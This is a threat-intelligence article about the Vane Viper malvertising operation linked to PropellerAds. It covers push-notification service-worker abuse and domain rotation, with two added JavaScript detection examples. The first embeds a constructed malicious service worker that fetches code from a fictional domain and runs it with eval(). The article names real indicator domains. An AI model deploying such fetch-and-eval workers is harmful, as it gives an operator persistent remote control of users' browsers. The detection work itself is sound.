Threat Actors Abuse Adtech Companies to Target Users With Malicious Ads


The digital advertising ecosystem has become a prime hunting ground for cybercriminals, who are increasingly exploiting advertising technology companies to distribute malware and conduct malicious campaigns.

Rather than merely abusing legitimate platforms, threat actors now operate as the platforms themselves, building a web of interlocking companies that exploits the complexity and fragmentation of the adtech supply chain to avoid accountability.

Recent investigations have uncovered a massive operation attributed to Vane Viper, a threat actor observed in roughly half of the customer networks monitored by the researchers and responsible for about one trillion DNS queries over the past year.


This operation benefits from hundreds of thousands of compromised websites and strategically placed advertisements across gaming, shopping, and blog sites worldwide.

The actor’s infrastructure spans approximately 60,000 domains, representing only a fraction of the broader malicious ecosystem they control.

The sophistication of this campaign lies in its carefully constructed corporate structure designed for plausible deniability.

Corporate filings trace Vane Viper to AdTech Holding, a Cyprus-based company whose flagship subsidiary, PropellerAds, operates as both an advertising network and traffic broker.

Figure: Key company relationships (Source – Infoblox)

Infoblox researchers identified evidence suggesting that PropellerAds has gone beyond turning a blind eye to criminal abuse of its platform, with indicators pointing to several ad-fraud campaigns originating directly from infrastructure attributed to the company.

The malvertising operation employs a traffic distribution system (TDS) that routes visitors through multiple layers of redirection before deciding what to deliver.

Because the TDS profiles each visitor at every hop, it can serve harmless content to crawlers, sandboxes and other automated security tools while steering human users to malicious destinations, which is why a single fetch of a landing URL from an analysis box often shows nothing suspicious.

The campaign’s reach extends beyond traditional malware distribution, encompassing fake shopping sites, fraudulent browser extensions, survey scams, and adult content designed to maximize profit from compromised traffic.

Push Notification Persistence Mechanism

The most insidious aspect of Vane Viper’s operation involves the abuse of browser push notifications to achieve persistent access to victim devices.

The campaign relies on malicious service workers: JavaScript files that a site registers with the browser and that keep running independently of any open tab, intercepting network requests between the web application and its servers and receiving push events. That lifecycle is what lets the actor maintain long-term access to compromised browsers.

Figure: PropellerAds displaying where they sit in the digital advertising ecosystem (Source – Infoblox)

These service workers use script chaining (each script loading further scripts) to abuse push notifications. The most concerning element is their use of eval() to execute arbitrary content fetched from remote URLs, so the worker's behaviour is not fixed at install time.

The remote URL is built from domains hardcoded in the service worker. Because the worker itself never needs to change, the operator can swap the fetched payload at will, which turns the hardcoded domain into a lightweight command-and-control channel that adapts to changing operational requirements.

Once a user grants the notification permission, the browser becomes part of a persistent malvertising network: the actor can push a continuous stream of malicious advertisements to it even when the originating site is no longer open.
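The pattern described above (a push handler, chained scripts, and eval() of content fetched from a hardcoded domain) is easy to triage statically once a service worker file has been captured from a suspicious site. The following is an added example written for this page, not code from the Infoblox report or from Vane Viper; both sample scripts and the .test domains in them are constructed for illustration.

```javascript
// Static triage of a service worker script for the push-notification abuse
// pattern the article describes: a push event handler, script chaining via
// importScripts, and eval() of content fetched from a domain hardcoded in the
// worker. Added example; the two samples below are constructed and the .test
// domains are fictional.

const SUSPICIOUS_SW = `
importScripts("https://cdn.example-push.test/sw-core.js");
var CFG = "https://example-tracker.test/cfg";
self.addEventListener("push", function (e) {
  fetch(CFG + "?t=" + Date.now())
    .then(function (r) { return r.text(); })
    .then(function (code) { eval(code); });
});
self.addEventListener("notificationclick", function (e) {
  e.notification.close();
  clients.openWindow("https://example-landing.test/go");
});
`;

// An ordinary offline-cache worker: it calls fetch() but never eval().
const BENIGN_SW = `
self.addEventListener("install", function () { self.skipWaiting(); });
self.addEventListener("fetch", function (e) {
  e.respondWith(caches.match(e.request).then(function (r) { return r || fetch(e.request); }));
});
`;

// Pull every hostname that appears in an absolute http(s) URL literal; these
// are the hardcoded domains worth pivoting on in DNS or passive-DNS data.
function extractDomains(src) {
  const out = new Set();
  const re = /https?:\/\/([a-z0-9][a-z0-9.-]*)/gi;
  let m;
  while ((m = re.exec(src)) !== null) out.add(m[1].toLowerCase());
  return [...out].sort();
}

// Heuristic indicators, each a regex over the worker source text.
const INDICATORS = {
  "push-handler":    /addEventListener\(\s*["']push["']/,
  "script-chaining": /\bimportScripts\s*\(/,
  "dynamic-eval":    /\beval\s*\(|new\s+Function\s*\(/,
  "remote-fetch":    /\bfetch\s*\(/,
  "opens-window":    /clients\.openWindow\s*\(/,
};

function triageServiceWorker(src) {
  const findings = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(src));
  const domains = extractDomains(src);
  // eval() in a worker that also fetches is the decisive signal: the code that
  // runs is whatever the remote domain serves. A push handler that chains
  // scripts or opens windows is weaker and only warrants manual review.
  const fetchEval = findings.includes("dynamic-eval") && findings.includes("remote-fetch");
  const pushChain = findings.includes("push-handler") &&
    (findings.includes("script-chaining") || findings.includes("opens-window"));
  let verdict = "benign";
  if (fetchEval) verdict = "malicious-pattern";
  else if (pushChain) verdict = "review";
  return { verdict, findings, domains };
}

// Stand-alone run: triage both constructed samples.
if (typeof require !== "undefined" && require.main === module) {
  console.log(triageServiceWorker(SUSPICIOUS_SW));
  console.log(triageServiceWorker(BENIGN_SW));
}
```

The regexes are deliberately simple and will miss obfuscated workers (string-built `eval`, `self["ev"+"al"]`), so treat a "benign" result as "nothing obvious" rather than as a clean bill; the extracted domain list is the more durable output, since the article notes that the hardcoded push domains stay stable for years while everything around them rotates.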

The operation is resilient because of its domain management strategy: it cycles through thousands of newly registered domains each month while keeping a small set of push notification domains alive for years.

Most operational domains remain active for less than a month, and registrations reached about 3,500 domains in peak months. By contrast, core infrastructure domains such as omnatuor.com and propeller-tracking.com, along with push notification services including in-page-push.com and pushimg.com, have stayed in operation for more than 1,200 days, which keeps the network running even as takedowns remove the short-lived domains around them.
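That split between disposable and long-lived domains is itself a detection opportunity in DNS telemetry: a client that resolves several domains registered within the last month and, in the same window, one of the stable push or tracking domains is following the TDS chain described above. The following is an added example written for this page, not tooling from the Infoblox report. The four core domains are the ones named in the article; the registration dates, the .example and .test names, and the log lines are constructed stand-ins for what a WHOIS or passive-DNS feed would supply.

```javascript
// Triage of DNS query logs for the rotation pattern the article describes:
// many short-lived, recently registered domains plus a few long-lived core
// domains. Added example; the core domain list comes from the article, while
// the first-seen dates, the .example/.test names and the log are constructed.

const CORE_DOMAINS = new Set([
  "omnatuor.com", "propeller-tracking.com", "in-page-push.com", "pushimg.com",
]);

// Constructed first-seen dates (a real deployment would query a registration
// or passive-DNS source for these).
const FIRST_SEEN = {
  "omnatuor.com": "2021-01-05",
  "pushimg.com": "2020-11-20",
  "qzx-redir-4471.example": "2025-08-28",
  "tdsgo-9920.example": "2025-08-30",
  "landing-offer-313.example": "2025-09-02",
  "cdn.example-corp.test": "2015-06-01",
  "updates.example-corp.test": "2016-03-14",
};

// Constructed query log: timestamp, client IP, queried name.
const LOG = `
2025-09-05T08:00:01Z 10.1.1.7 qzx-redir-4471.example
2025-09-05T08:00:02Z 10.1.1.7 tdsgo-9920.example
2025-09-05T08:00:03Z 10.1.1.7 omnatuor.com
2025-09-05T08:00:04Z 10.1.1.7 landing-offer-313.example
2025-09-05T08:00:05Z 10.1.1.7 pushimg.com
2025-09-05T08:01:00Z 10.1.1.9 cdn.example-corp.test
2025-09-05T08:01:01Z 10.1.1.9 updates.example-corp.test
2025-09-05T08:01:02Z 10.1.1.9 omnatuor.com
2025-09-05T08:02:00Z 10.1.1.12 updates.example-corp.test
`;

const YOUNG_DAYS = 30; // article: most operational domains live under a month
const MIN_YOUNG = 2;   // young domains a client must touch before it is flagged

// Age of the domain at the moment of the query, in days; null if unknown.
function domainAgeDays(name, atIso) {
  const seen = FIRST_SEEN[name];
  if (seen === undefined) return null;
  return (Date.parse(atIso) - Date.parse(seen)) / 86400000;
}

function parseLog(text) {
  return text.trim().split("\n").map((line) => {
    const [ts, client, name] = line.trim().split(/\s+/);
    return { ts, client, name: name.toLowerCase() };
  });
}

// Per client: which young domains and which core domains it resolved, and a
// verdict. Core-domain hits alone go on a watchlist because those domains are
// stable indicators; the combination with young domains is the stronger signal.
function triageDns(text) {
  const clients = new Map();
  for (const rec of parseLog(text)) {
    const c = clients.get(rec.client) || { young: new Set(), core: new Set() };
    const age = domainAgeDays(rec.name, rec.ts);
    if (age !== null && age < YOUNG_DAYS) c.young.add(rec.name);
    if (CORE_DOMAINS.has(rec.name)) c.core.add(rec.name);
    clients.set(rec.client, c);
  }
  const report = {};
  for (const [client, c] of clients) {
    let verdict = "clean";
    if (c.young.size >= MIN_YOUNG && c.core.size > 0) verdict = "suspicious";
    else if (c.core.size > 0) verdict = "watchlist";
    report[client] = { young: [...c.young], core: [...c.core], verdict };
  }
  return report;
}

// Stand-alone run over the constructed log.
if (typeof require !== "undefined" && require.main === module) {
  console.log(triageDns(LOG));
}
```

Domain age is computed at query time rather than at analysis time so that replaying old logs does not make last year's throwaway domains look mature; unknown domains are left unscored rather than assumed young, which keeps a gap in the registration feed from turning into a flood of alerts.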




About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.